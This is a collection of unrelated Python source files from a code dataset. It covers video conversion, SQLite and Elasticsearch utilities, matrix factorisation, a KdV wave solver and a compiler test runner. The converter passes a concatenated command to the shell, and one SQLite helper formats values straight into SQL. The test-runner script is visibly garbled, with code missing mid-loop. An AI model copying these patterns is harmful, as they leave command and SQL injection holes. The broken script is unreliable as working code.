+{"seq_id":"429656714","text":"import glob, os\r\nimport subprocess\r\n\r\ndirPath = input(\"Enter Dir path where target Video File is located: \")\r\nos.chdir(dirPath)\r\n\r\nfileName = input(\"Enter FileName: \")\r\nbitRate = input(\"Enter video bitRate [0: for default, 1M, 1500K etc] : \")\r\nultraFast = input(\"Enable Ultrafast? [y/n] : \")\r\noutFileName = fileName + \"_conv.mp4\"\r\nfileName = fileName + \".mp4\"\r\n\r\nif ultraFast.lower() == 'y':\r\n    ultraFastStr = \" -preset ultrafast \"\r\nelse:\r\n    ultraFastStr = \" \"\r\n\r\nif bitRate != '0':\r\n    ffmpegCmd = \"ffmpeg -i \" + fileName + \" -c:v libx265 -b:v \" + bitRate + \" -c:a copy\" + ultraFastStr + outFileName\r\nelse:\r\n    ffmpegCmd = \"ffmpeg -i \" + fileName + \" -c:v libx265 -c:a copy\" + ultraFastStr + outFileName\r\n\r\nretValue = subprocess.call(ffmpegCmd, shell=True)\r\nprint(retValue)\r\n","sub_path":"vidConvertToHEVC.py","file_name":"vidConvertToHEVC.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
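# --- Editor's example (not a dataset record). The record above concatenates one ffmpeg
# command string and runs it with shell=True, which breaks on file names with spaces. A
# hedged alternative sketch: pass the arguments as a list so no shell parsing happens.
# It assumes ffmpeg is on PATH; the function and file names here are illustrative only.
import subprocess

def convert_to_hevc(in_file, out_file, bit_rate=None, ultrafast=False):
    cmd = ['ffmpeg', '-i', in_file, '-c:v', 'libx265', '-c:a', 'copy']
    if bit_rate:  # e.g. '1M' or '1500K'; omit to keep the encoder default
        cmd += ['-b:v', bit_rate]
    if ultrafast:
        cmd += ['-preset', 'ultrafast']
    cmd.append(out_file)
    return subprocess.call(cmd)  # exit code 0 on success

# convert_to_hevc('clip.mp4', 'clip_conv.mp4', bit_rate='1M', ultrafast=True)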
+{"seq_id":"492986468","text":"import re\nimport sqlite3\nimport csv\nimport numpy as np\nimport os\nimport yaml\nimport logging\nimport sys\nimport logging.config\n\n\nlogger = logging.getLogger(__name__)\n\nPROJECT_DIR = '~/icecube/meta-projects/offline-software/trunk/hist-assignment'\n\ndef init_multiprocess_logging():\n    \"\"\"The normal python logging module is not multiprocess safe so a custom implementation is\n    used instead.\"\"\"\n    if os.path.exists('config/logging_config.yaml'):\n        with open('config/logging_config.yaml', 'rt') as f:\n            config = yaml.load(f.read())\n            logging.config.dictConfig(config)\n\n\ndef get_program_dir():\n    return PROJECT_DIR\n\n\ndef gen_info_from_old_fn(filename):\n    match = re.search(r\"([^\\.\\/]+?)(?:-histo)?\\.([^\\.\\/]+)\\.([^\\.\\/]+)(?=.pickle)\", filename)\n    dataset_id = match.group(2)\n    category = match.group(1)\n    queue_id = match.group(3)\n    return dataset_id, category, queue_id\n\n\ndef get_info_from_fn(filename):\n    \"\"\"\n    Returns the information from a given fn.\n    :param filename:\n    :return: (dataset_id, category, queue_id, subcategory)\n    \"\"\"\n    match = re.search(r\"(?:^|\\/)([^\\.\\/]+)\\.([^\\.\\/]+)\\.([^\\.\\/]+)\\.([^\\.\\/]+)(?=-histo.pickle)\", filename)\n    dataset_id = match.group(1)\n    category = match.group(2)\n    queue_id = match.group(3)\n    subcategory = match.group(4)\n    return dataset_id, category, queue_id, subcategory\n\n\ndef generate_filename(dataset_id, category, queue_id, subcategory):\n    filename_template = \"{dataset_id}.{category}.{queue_id}.{subcategory}-histo.pickle\"\n    return filename_template.format(dataset_id=dataset_id, category=category, queue_id=queue_id, subcategory=subcategory)\n\n\ndef progress(count, total, suffix=''):\n    \"\"\"\n    Draws a progress bar to the standard output.\n\n    :param count: number\n    :param total: number\n    :param suffix: Displayed at end of progress bar\n    :return: None\n    \"\"\"\n    bar_len = 60\n    filled_len = int(round(bar_len * count / float(total)))\n\n    percents = round(100.0 * count / float(total), 1)\n    bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n    sys.stdout.write('[%s] %s%s ...%s\\r' % (bar, percents, '%', suffix))\n    if count == total:\n        sys.stdout.write('\\n')\n    sys.stdout.flush()\n\n# HISTOGRAM RETRIEVAL AND PROCESSING METHODS\nclass ServerVariables:\n    \"\"\"\n    Used to store data about the datasets that the server has processed.\n    \"\"\"\n    def __init__(self):\n        # self.datasets is a dict of (dataset_id, SimulationDataset)\n        self.datasets = {}\n\n\nclass SimulationDataset:\n    \"\"\"Class used to keep track of the attributes of one simulation dataset.\"\"\"\n    def __init__(self, dataset_id):\n        self.dataset_id = dataset_id\n        self.jobs_updated = True\n        self.files_corrupt = 0\n        self.categories = set()\n        self.histogram_names_dict = {}\n        self.subcategory_dict = {}\n        self.num_flagged_jobs = 0\n\n\nclass ReasonTriggered:\n    def __init__(self, name, filter_name, comment, value, cutoff_value):\n        \"\"\"\n        :param name: name of the histogram which triggered the filter\n        :param filter_name: name of the filter that was triggered\n        :param comment: more information about the reason triggered\n        :param value: value of the parameter which triggered the filter\n        :param cutoff_value: minimum value which would trigger the filter\n        \"\"\"\n        self.histogram_name = name\n        self.filter_name = filter_name\n        self.comment = comment\n        self.value = value\n        self.cutoff_value = cutoff_value\n\n\nclass SuspiciousJob:\n    def __init__(self, dataset_id, category, queue_id, subcategory, reasons):\n        \"\"\"\n        :param dataset_id:\n        :param category:\n        :param queue_id:\n        :param subcategory:\n        :param reasons: a list of ReasonTriggered objects\n        \"\"\"\n        self.dataset_id = dataset_id\n        self.category = category\n        self.queue_id = queue_id\n        self.subcategory = subcategory\n        self.reasons = reasons\n\n\nclass HistogramDistribution:\n    \"\"\"Contains information about the contents of one column of the analysis_db. All of the self.percentile_XXX\n    attributes hold the value at the corresponding percentile in the distribution. IE, percentile_50 represents the\n    median element. \"\"\"\n    def __init__(self, sd, mean, p50, p95, p99, p999, p100):\n        self.sd = sd\n        self.mean = mean\n        self.percentile_50 = p50\n        self.percentile_95 = p95\n        self.percentile_99 = p99\n        self.percentile_999 = p999\n        self.percentile_100 = p100\n\n    @staticmethod\n    def create_from_np_array(arr):\n        sd = arr.std()\n        mean = arr.mean()\n        pc = np.percentile(arr, [50.00, 95.0, 99.0, 99.9, 100.0])\n        return HistogramDistribution(sd, mean, pc[0], pc[1], pc[2], pc[3], pc[4])\n\n\nclass SQLiteUtil:\n    @staticmethod\n    def strip_bad_sql_chars(header_list):\n        for i in range(len(header_list)):\n            del_nonword = r\"([^\\w\\ -])\"\n            header_list[i] = re.sub(del_nonword, \"\", header_list[i]).replace('-', '_')\n            # header_list[i] = ''.join(char for char in header_list[i] if char.isalnum() or char in ['-', '_', ' '])\n            # header_list[i] = header_list[i].replace('-', '_')\n        return header_list\n\n    @staticmethod\n    def add_row_to_db(conn, row_dict):\n        \"\"\"\n        Adds a row to the database where the dictionary's keys are the column names. Does not commit.\n        :param row_dict: keys are column names, values are values\n        :param conn: sqlite3 database connection\n        :return:\n        \"\"\"\n        keys = ','.join(SQLiteUtil.strip_bad_sql_chars(list(row_dict.keys())))\n        question_marks = ','.join(list('?' 
* len(row_dict)))\n values = tuple(row_dict.values())\n conn.execute('INSERT INTO jobs' + '(' + keys + ') VALUES (' + question_marks + ')', values)\n\n @staticmethod\n def get_column_names(conn, table_name):\n \"\"\"\n :param conn: connection to a sqlite3 db\n :param table_name: string\n :return: column names from the database\n \"\"\"\n cursor = conn.execute(\"SELECT * FROM {} LIMIT 0\".format(table_name))\n return list(map(lambda x: x[0], cursor.description))\n\n @staticmethod\n def get_column_values(conn, col_name, table_name):\n command = \"SELECT {} FROM {}\".format(col_name, table_name)\n old_factory = conn.row_factory\n conn.row_factory = lambda cursor, row: row[0]\n vals = conn.execute(command).fetchall()\n conn.row_factory = old_factory\n return vals\n\n @staticmethod\n def create_db_table(header_list, conn):\n # Strip column names to avoid SQL injection\n header_list = SQLiteUtil.strip_bad_sql_chars(header_list)\n c = conn.cursor()\n command = \"CREATE TABLE jobs {}\".format(str(tuple(header_list)))\n command = command.replace(\"'\", \"\")\n c.execute(command)\n conn.commit()\n\n @staticmethod\n def sqlite_to_csv(db_path, out_path, table_name):\n conn = sqlite3.connect(db_path)\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM {};\".format(table_name))\n with open(out_path, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow([i[0] for i in cursor.description]) # write headers\n csv_writer.writerows(cursor)\n conn.close()\n\n @staticmethod\n def select_row(conn, queue_id, subcategory, table_name):\n \"\"\"sqlite3.row_factory must be set to sqlite3.Row\"\"\"\n command = \"SELECT * FROM {} WHERE queue_id={} AND subcategory = '{}'\".format(table_name, queue_id, subcategory)\n c = conn.cursor()\n c.execute(command)\n return c.fetchone()\n","sub_path":"source/histogramutil.py","file_name":"histogramutil.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"563050944","text":"#!/usr/bin/python3\n\"\"\"\nModule contains a script that prints the State object with\nthe name passed as argument from the database hbtn_0e_6_usa.\n\"\"\"\n\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef print_state_id():\n \"\"\"\n Prints the State object with the name passed as\n argument from the database hbtn_0e_6_usa.\n \"\"\"\n\n arg = sys.argv\n url_base = 'mysql+mysqldb://{}:{}@localhost:3306/{}'\n db_url = url_base.format(arg[1], arg[2], arg[3])\n engine = create_engine(db_url, pool_pre_ping=True)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n result = session.query(State).filter(State.name == arg[4]).first()\n if result is not None:\n print(result.id)\n else:\n print(\"Not found\")\n\n\nif __name__ == \"__main__\":\n print_state_id()\n","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494364698","text":"import math \nimport numpy as np\nimport random\nfrom copy import deepcopy\nimport time\n\ndef cs(w_ik, w_jk):\n \"\"\"Calculates c and s used in Givens rotation.\n\n Parameters\n ----------\n w_ik : float\n w_jk : float\n\n Returns\n ----------\n c : float\n s : float\n \"\"\"\n # otimizado\n if abs(w_jk) < 
np.finfo(np.double).eps:\n return 1.0,0.0\n r = np.hypot(w_ik,w_jk)\n return w_ik/r, -w_jk/r\n # if abs(w_ik) > abs(w_jk):\n # tau = -w_jk/w_ik\n # return 1/math.sqrt(1+tau*tau), tau/math.sqrt(1+tau*tau)\n # else:\n # tau = -w_ik/w_jk\n # return tau/math.sqrt(1+tau*tau), 1/math.sqrt(1+tau*tau)\n\ndef Rotgivens(W, n, m, i, j, k, c, s):\n \"\"\"Givens rotation.\n\n Parameters\n ----------\n W : float[][] \n n : int \n m : int \n i : int\n j : int\n c : float\n s : float\n\n Returns\n ----------\n W : float[][]\n \"\"\"\n assert type(n) is int, \"n should be integer, received %s\" %(type(n))\n assert type(m) is int, \"m should be integer, received %s\" %(type(m))\n assert type(i) is int, \"i should be integer, received %s\" %(type(i))\n\n for r in range(k,m):\n aux = c * W[i][r] - s * W[j][r]\n W[j][r] = s * W[i][r] + c * W[j][r]\n W[i][r] = aux\n return W\n\ndef solveLinear(W, n, m, b):\n \"\"\"Solves a linear equations system W(n,m) * x = b.\n\n Parameters\n ----------\n W : float[][] \n n : int \n m : int \n b : float[]\n\n Returns\n ----------\n x : float[]\n \"\"\"\n for k in range(m):\n for j in range(n-1, k, -1):\n i=j-1\n if W[j][k] != 0:\n c, s = cs(W[i][k], W[j][k])\n Rotgivens(W, n, m, i, j, k, c, s)\n Rotgivens(b, n, 1, i, j, 0, c, s)\n x = np.zeros(m)\n for k in range(m-1, -1, -1):\n sum = 0\n for j in range(k+1, m):\n sum += W[k][j]*x[j]\n x[k] = (b[k] - sum)/W[k][k]\n\n return x\n\ndef maxError(sol_ref, sol):\n \"\"\"Calculates maximum error between sol_ref and sol arrays.\n\n Parameters\n ----------\n sol_ref : float[]\n sol : float[]\n\n Returns\n ----------\n err_max : float\n \"\"\"\n assert len(sol_ref) == len(sol), \"solutions must have same size, got %d and %d\" %(len(sol_ref), len(sol))\n err_max = abs(sol_ref[0] - sol[0])\n for i in range(1, len(sol)):\n err = abs(sol_ref[i] - sol[i])\n if err > err_max:\n err_max = err\n return err_max\n\ndef solveMultipleLinear(W, n, m, p, A):\n \"\"\"Solves multiple linear equations system W(n,p) * h(p,m) = A(n,m).\n\n Parameters\n ----------\n W : float[][]\n n : int\n m : int\n p : int\n A : float[][]\n\n Returns\n ----------\n h : float[][]\n \"\"\"\n for k in range(p):\n for j in range(n-1, k, -1):\n i=j-1\n if W[j][k] != 0:\n c, s = cs(W[i][k], W[j][k])\n Rotgivens(W, n, p, i, j, k, c, s)\n Rotgivens(A, n, m, i, j, 0, c, s)\n\n h = np.zeros((p, m))\n for k in range(p-1, -1, -1):\n for j in range(m):\n sum = 0\n for i in range(k+1, p):\n sum += W[k][i]*h[i][j]\n h[k][j] = (A[k][j] - sum)/W[k][k]\n return h\n\ndef squaredError(A, W, H):\n \"\"\"Calculates squared error ||A − W * H||**2.\n\n Parameters\n ----------\n A : float[][]\n W : float[][]\n H : float[][]\n\n Returns\n ----------\n err : float\n \"\"\"\n return (np.square(A - np.matmul(W, H))).mean(axis=None)\n # err = 0\n # for i in range(n):\n # for j in range(m):\n # err += (A[i][j] - np.matmul(W, H)[i][j])**2\n # return err\n\ndef columnNorms(W):\n \"\"\"Calculates norms of W columns.\n\n Parameters\n ----------\n W : float[][]\n\n Returns\n ----------\n column_norms : float[]\n \"\"\"\n return np.sqrt((W * W).sum(axis=0))\n\ndef normalizeMatrix(W, n, p):\n \"\"\"Normalizes all columns of matrix W(n,p).\n\n Parameters\n ----------\n W : float[][]\n n : int\n p : int\n \"\"\"\n column_norms = columnNorms(W)\n for i in range(n):\n for j in range(p):\n W[i][j] = W[i][j]/column_norms[j]\n\ndef positiveMatrix(H, p, m):\n \"\"\"Transform matrix H(p,m) to be only positive.\n\n Parameters\n ----------\n H : float[][]\n p : int\n m : int\n \"\"\"\n for i in range(p):\n for j in 
range(m):\n H[i][j] = max(0, H[i][j])\n\n\ndef NMF(A, n, m, p):\n \"\"\"Calculates W and H, so that A(n,m) = W(n,p) * H(p,m).\n A should be a positive matrix.\n W and H are also positives.\n\n Parameters\n ----------\n A : float[][]\n n : int\n m : int\n p : int\n\n Returns\n ----------\n W : float[][]\n H : float[][]\n \"\"\"\n W = np.random.rand(n, p)\n H = np.zeros((p, m))\n\n epislon = 0.00001\n itmax = 100\n err_ant = squaredError(A, W, H)\n err = np.inf\n iterations = 0\n while abs(err-err_ant) > epislon and iterations < itmax:\n start_time = time.time()\n normalizeMatrix(W, n, p)\n \n start_time = time.time()\n H = solveMultipleLinear(deepcopy(W), n, m, p, deepcopy(A))\n print(\"solveMultipleLinear feita em %.3f segundos!\"%(time.time() - start_time))\n \n start_time = time.time()\n positiveMatrix(H, p, m)\n \n At = np.transpose(A)\n Ht = deepcopy(np.transpose(H))\n start_time = time.time()\n Wt = solveMultipleLinear(Ht, m, n, p, At)\n print(\"solveMultipleLinear transpose feita em %.3f segundos!\"%(time.time() - start_time))\n\n W = np.transpose(Wt)\n positiveMatrix(W, n, p)\n \n err_ant = err\n start_time = time.time()\n err = squaredError(A, W, H)\n iterations+=1\n print(iterations)\n print(abs(err-err_ant))\n return W, H\n\ndef readMatrix(filename, m):\n \"\"\"Reads a matrix from a file, then select only the first m columns.\n\n Parameters\n ----------\n filename : str\n m : int\n\n Returns\n ----------\n matrix : float[][]\n \"\"\"\n cols = []\n for i in range(m):\n cols.append(i)\n matrix = np.loadtxt(filename, usecols=cols)\n matrix = matrix/255\n return matrix","sub_path":"digit-classifier-master/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":6487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"418418286","text":"# KDV Equation + Time Discretization Using Runge-Kutta\n# u = u(x,t) velocity is a function of time and space\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import hypsecant\n\n#==================================================================\n# Find the x values that we will be testing\n# Parameter is step size\n#==================================================================\n\ndef findx(h):\n x = []\n index = 0\n stepsize = int(1/h)\n for i in range(-10,10):\n i = float(i)\n x.append(i)\n for j in range(1,stepsize):\n index = index + h\n k = round((i + index), 2)\n x.append(k)\n index = 0\n x.append(10.0)\n return x\n\n#==================================================================\n# Find the t values that we will be testing\n# Parameter is step size\n#==================================================================\n\ndef findt(h):\n t = []\n index = 0\n stepsize = int(1/h)\n for i in range(0,2):\n i = float(i)\n t.append(i)\n for j in range(1,stepsize):\n index = index + h\n k = round((i + index), 2)\n t.append(k)\n index = 0\n t.append(2.0)\n return t\n\n#==================================================================\n# Initial Wave Function\n#==================================================================\n\ndef wavePosition(x):\n u = []\n for i in range(len(x)):\n temp = .5*((1/(np.cosh(.5*x[i])))**2)\n u.append(temp)\n return u\n\n#==================================================================\n# Actual Wave Function\n#==================================================================\n\ndef actualWavePosition(x,t):\n u = []\n for i in range(len(x)):\n temp = .5*((1/(np.cosh(.5*(x[i]-t))))**2)\n 
u.append(temp)\n return u\n\n#===============================================================================\n# KDV Equation (to model wave movement at next time interval)\n# Discretized the Ux variables\n#===============================================================================\n\ndef disUX(u,x):\n # the next position\n u_prime = []\n\n #step size\n size = len(x)-1\n #sections\n h = 20/(len(x))\n\n # for each element in u, we want to calculate the derivative with respect to x\n for i in range(len(x)):\n if i == 0:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[i+1])**2)-((u[(size-1)])**2))/(2*h))\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(i+2)])-(2*(u[(i+1)]))+(2*(u[(size-1)]))-(u[(size-2)]))/((2*h)**3)\n u_prime.append(firstElement + secondElement)\n elif i == 1:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[i+1])**2)-((u[(i-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(i+2)])-(2*(u[(i+1)]))+(2*(u[(i-1)]))-(u[(size)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n elif i == size:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[1])**2)-((u[(size-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(2)])-(2*(u[(1)]))+(2*(u[(i-1)]))-(u[(i-2)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n elif i == (size-1):\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[i+1])**2)-((u[(i-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(1)])-(2*(u[(i+1)]))+(2*(u[(i-1)]))-(u[(i-2)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n else:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[(i+1)])**2)-((u[(i-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(i+2)])-(2*(u[(i+1)]))+(2*(u[(i-1)]))-(u[(i-2)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n #print u_prime\n return u_prime\n\n#===============================================================================\n# KDV Equation (to model wave movement at next time interval)\n# Discretized the Ut function\n#===============================================================================\n\ndef disUT(u,u_ux,x):\n #change in time varible hard coded as .01\n deltaT = .005\n\n #list to hold all solutions that are a result of the discretized Ut function\n u_prime = u_ux\n\n a = []\n b = []\n c = []\n d = []\n e = []\n\n for i in range(len(u)):\n k = u[i] + (deltaT*u_prime[i])\n a.append(k)\n \n b = disUX(a,x)\n\n for i in range(len(a)):\n k = (.75*u[i]) + (.25*a[i]) + (.25*deltaT*b[i])\n c.append(k)\n\n d = disUX(c,x)\n\n for i in range(len(c)):\n k = ((1/3)*u[i]) + ((2/3)*c[i]) + ((2/3)*deltaT*d[i])\n e.append(k)\n\n return e\n\n\n#===============================================================================\n# KDV Equation (to model wave movement at next time interval\n# U(sub-t) + 6UU(sub-x) + U(sub-xxx) = 0 \n# However, we will not be able to easily integrate this equation\n# So we will have to discretize the derivatives\n#===============================================================================\n\ndef kdv(u,x):\n u_ux = disUX(u,x)\n u_ut = disUT(u,u_ux,x)\n return u_ut\n\n#===============================================================================\n# Plot 
Points\n#===============================================================================\n\ndef plot(u,uActual,x):\n    # X-Axis = x-values tested\n    # Y-Axis = wave velocity or position\n\n    plt.figure(figsize = (30,20))\n    plt.subplot(3,1,1)\n    plt.plot(x,u[0])\n    plt.plot(x,uActual[0])\n    plt.xlabel('time')\n    plt.ylabel('velocity')\n    plt.legend(('KDV.RK3','actual'))\n    plt.title('Velocity plot at t=0')\n    \n    plt.subplot(3,1,2)\n    plt.plot(x,u[50])\n    plt.plot(x,uActual[50])\n    plt.xlabel('time')\n    plt.ylabel('velocity')\n    plt.legend(('KDV.RK3','actual'))\n    plt.title('Velocity plot at t = 100')\n    \n    plt.subplot(3,1,3)\n    plt.plot(x,u[200])\n    plt.plot(x,uActual[200])\n    plt.xlabel('time')\n    plt.ylabel('velocity')\n    plt.legend(('KDV.RK3','actual'))\n    plt.title('Velocity plot at t= 200')\n    plt.savefig('KDV_4.png')\n    plt.show()\n\n    \n    return\n\n\n#==================================================================\n# Main Function (Initialize Variables and Call Functions)\n#==================================================================\n\ndef main():\n    \"\"\"\n    This function executes when this file is run as a script.\n    \"\"\"\n\n    #space (x), we will test an array of values for x\n    # -10 to 10, step size will be passed to the function\n    x_stepsize = 1\n    x = findx(x_stepsize)\n    #print x\n\n    #time (t), we will test an array of values of t\n    # 0 to 2, step size will be passed to the function\n    t_stepsize = .01\n    t = findt(t_stepsize)\n    #print t\n\n\n    #=========================================\n    # Initial Condition (time = 0)\n    # Call wavePosition Function\n    #=========================================\n\n    #velocity (u), we will use the wave function to find the initial velocity at each x-value\n    uRecord = []\n    uRecord.append(wavePosition(x))\n\n    #=========================================\n    # Call to KDV Function to get position at next time interval\n    #=========================================\n\n    temp = []\n    temp2 = []\n\n    for i in range(len(t)):\n        if(i == 0):\n            temp.append(uRecord[0])\n            temp2 = uRecord[0]\n        elif(i > 0):\n            temp2 = kdv(temp2,x)\n            temp.append(temp2)\n\n\n    u = temp\n\n    #=========================================\n    # Find the Actual Solution\n    #=========================================\n\n    uActual = []\n    for i in range(len(t)):\n        uActual.append(actualWavePosition(x,t[i]))\n\n    #===============================================================================\n    # Call to plot function\n    #===============================================================================\n\n    plot(u,uActual,x)\n\n\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"KDV.py","file_name":"KDV.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
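# --- Editor's example (not a dataset record). disUT in the KDV record above is the
# Shu-Osher form of third-order strong-stability-preserving Runge-Kutta (SSP-RK3):
#   u1 = u + dt*L(u)
#   u2 = 3/4*u + 1/4*u1 + 1/4*dt*L(u1)
#   u  = 1/3*u + 2/3*u2 + 2/3*dt*L(u2)
# A minimal hedged sketch of the same stepper on the scalar test problem u' = -u, which
# is not part of the record; the exact solution is exp(-t), so at third order the two
# printed values should agree to many digits.
import math

def ssp_rk3(L, u, dt):
    u1 = u + dt * L(u)
    u2 = 0.75 * u + 0.25 * u1 + 0.25 * dt * L(u1)
    return u / 3.0 + 2.0 / 3.0 * u2 + 2.0 / 3.0 * dt * L(u2)

u, dt = 1.0, 0.005
for _ in range(200):            # integrate from t = 0 to t = 1.0
    u = ssp_rk3(lambda v: -v, u, dt)
print(u, math.exp(-1.0))        # both ~0.36788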
+{"seq_id":"149872396","text":"import os\nimport sys\nfrom threading import Thread\n\nos.chdir(\"../../../\")\n\nsyntaxPath = \"src/test/deca/syntax\"\nvalidFilesPath = \"src/test/deca/syntax/valid/our_tests\"\ninvalidFilesPath = \"src/test/deca/syntax/invalid/our_synt_tests\"\nvalidFileResultsPath = \"src/test/deca/syntax/valid/synt-results\"\ninvalidFileResultsPath = \"src/test/deca/syntax/invalid/synt-results\"\n\nlauncherPath = \"src/test/script/launchers\"\nscriptPath = \"src/test/script\"\n\ntestResultsPath = \"src/test/script/testResults\"\n\nisDebug = False\nisValid = False\nisInvalid = False\ncobertura = False\n\nnumPass = 0\nnumFail = 0\n\nfailedTests = []\n\nfor i in sys.argv:\n    if (i == \"-v\"):\n        isValid = True\n    if (i == \"-i\"):\n        isInvalid = True\n    if (i == \"-d\"):\n        isDebug = True\n    if (i == \"-c\"):\n        cobertura = True\n\nif (not(isDebug) and not(isInvalid) and not(isValid)):\n    isValid = True\n    isInvalid = True\n    isDebug = True\n\n## re(create) testResults\n\nif (os.path.isdir(testResultsPath)):\n    os.system(\"rm -rf \" + testResultsPath)\n    os.system(\"mkdir \" + testResultsPath)\nelse:\n    os.system(\"mkdir \" + testResultsPath)\n\n## create list of deca files to test\n\nvalidFiles = os.listdir(validFilesPath)\ninvalidFiles = os.listdir(invalidFilesPath)\n\ni=0\nwhile i \" + resultPath + \" 2>&1\")\n\n    if (isDebug):\n\n        if (os.system(\"diff -b \" + expectedResultPath + \" \" + resultPath)):\n            results[index] = False\n            print(\"###### FAIL: \" + testName + \" ######\")\n        else:\n            results[index] = True\n            print(\"###### PASS: \" + testName + \" ######\")\n\n    else:\n\n        os.system(\"diff -b \" + expectedResultPath + \" \" + resultPath + \" > \" + testResultsPath + \"/\" + testName + \"_diff.txt\")\n        \n        if (os.path.getsize(testResultsPath + \"/\" + testName + \"_diff.txt\") == 0):\n            results[index] = True\n        else:\n            results[index] = False\n\n\nif (isValid):\n    results = [None] * len(validFiles)\n\n    if (cobertura):\n        for i in range(len(validFiles)):\n            checkTest(True, validFiles[i], results, i)\n\n    else:\n        threads = [None] * len(validFiles)\n\n        for i in range(len(validFiles)):\n            threads[i] = Thread(target=checkTest, args=(True, validFiles[i], results, i))\n            threads[i].start()\n\n        for i in range(len(threads)):\n            threads[i].join()\n    \n    for i in range(len(validFiles)):\n        if results[i]:\n            numPass += 1\n        else:\n            numFail += 1\n            failedTests.append(validFiles[i])\n\nif (isInvalid):\n\n    results = [None] * len(invalidFiles)\n\n    if (cobertura):\n        for i in range(len(invalidFiles)):\n            checkTest(False, invalidFiles[i], results, i)\n\n    else:\n        threads = [None] * len(invalidFiles)\n\n        for i in range(len(invalidFiles)):\n            threads[i] = Thread(target=checkTest, args=(False, invalidFiles[i], results, i))\n            threads[i].start()\n\n        for i in range(len(threads)):\n            threads[i].join()\n    \n    for i in range(len(invalidFiles)):\n        if results[i]:\n            numPass += 1\n        else:\n            numFail += 1\n            failedTests.append(invalidFiles[i])\n\n\nprint(\"[SYNT] PASSED TESTS : \", numPass)\nprint(\"[SYNT] FAILED TESTS : \", numFail)\n\nif (not(isDebug)):\n\n    print(\"[SYNT] THE FAILED TESTS ARE : \", failedTests)","sub_path":"src/test/script/basic-synt.py","file_name":"basic-synt.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"628142428","text":"import psycopg2\nimport os\nimport sys\nimport logging as log\nimport time\n\nfrom aws_requests_auth.aws_auth import AWSRequestsAuth\nfrom elasticsearch import Elasticsearch, RequestsHttpConnection\nfrom elasticsearch.exceptions import AuthenticationException, \\\n    AuthorizationException, NotFoundError\nfrom elasticsearch.exceptions \\\n    import ConnectionError as ElasticsearchConnectionError\nfrom elasticsearch_dsl import Search, connections\nfrom elasticsearch import helpers\nfrom psycopg2.sql import SQL, Identifier\nfrom es_syncer.elasticsearch_models import database_table_to_elasticsearch_model\n\n\"\"\"\nA daemon for synchronizing database with Elasticsearch. For each table to\nsync, find its largest ID in database. Find the corresponding largest ID in\nElasticsearch. If the database ID is greater than the largest corresponding\nID in Elasticsearch, copy the missing records over to Elasticsearch.\n\nEach table in the database corresponds to an identically named index in\nElasticsearch. 
For instance, if database has a table that we would like to\nreplicate called 'image', the syncer will create an Elasticsearch called\n'image' and populate the index with documents. See elasticsearch_models to \nchange the format of Elasticsearch documents.\n\nThis is intended to be daemonized and run by a process supervisor.\n\"\"\"\n\n# For AWS IAM access to Elasticsearch\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\nELASTICSEARCH_URL = os.environ.get('ELASTICSEARCH_URL')\nELASTICSEARCH_PORT = int(os.environ.get('ELASTICSEARCH_PORT', 9200))\nAWS_REGION = os.environ.get('AWS_REGION', 'us-east-1')\n\nDATABASE_HOST = os.environ.get('DATABASE_HOST')\nDATABASE_USER = os.environ.get('DATABASE_USER')\nDATABASE_PASSWORD = os.environ.get('DATABASE_PASSWORD')\nDATABASE_NAME = os.environ.get('DATABASE_NAME')\nDATABASE_PORT = int(os.environ.get('DATABASE_PORT', 5432))\n\n# The number of database records to load in memory at once.\nDB_BUFFER_SIZE = int(os.environ.get('DB_BUFFER_SIZE', 100000))\n\nSYNCER_POLL_INTERVAL = int(os.environ.get('SYNCER_POLL_INTERVAL', 60))\n\n# A comma separated list of tables in the database table to replicate to\n# Elasticsearch. Ex: image,docs\nREP_TABLES = os.environ.get('COPY_TABLES', 'image')\nreplicate_tables = REP_TABLES.split(',') if ',' in REP_TABLES else [REP_TABLES]\n\n\nclass ElasticsearchSyncer:\n def __init__(self, elasticsearch_instance, tables):\n self.es = elasticsearch_instance\n connections.connections.add_connection('default', self.es)\n self.tables_to_watch = tables\n\n def _synchronize(self):\n \"\"\"\n Check that 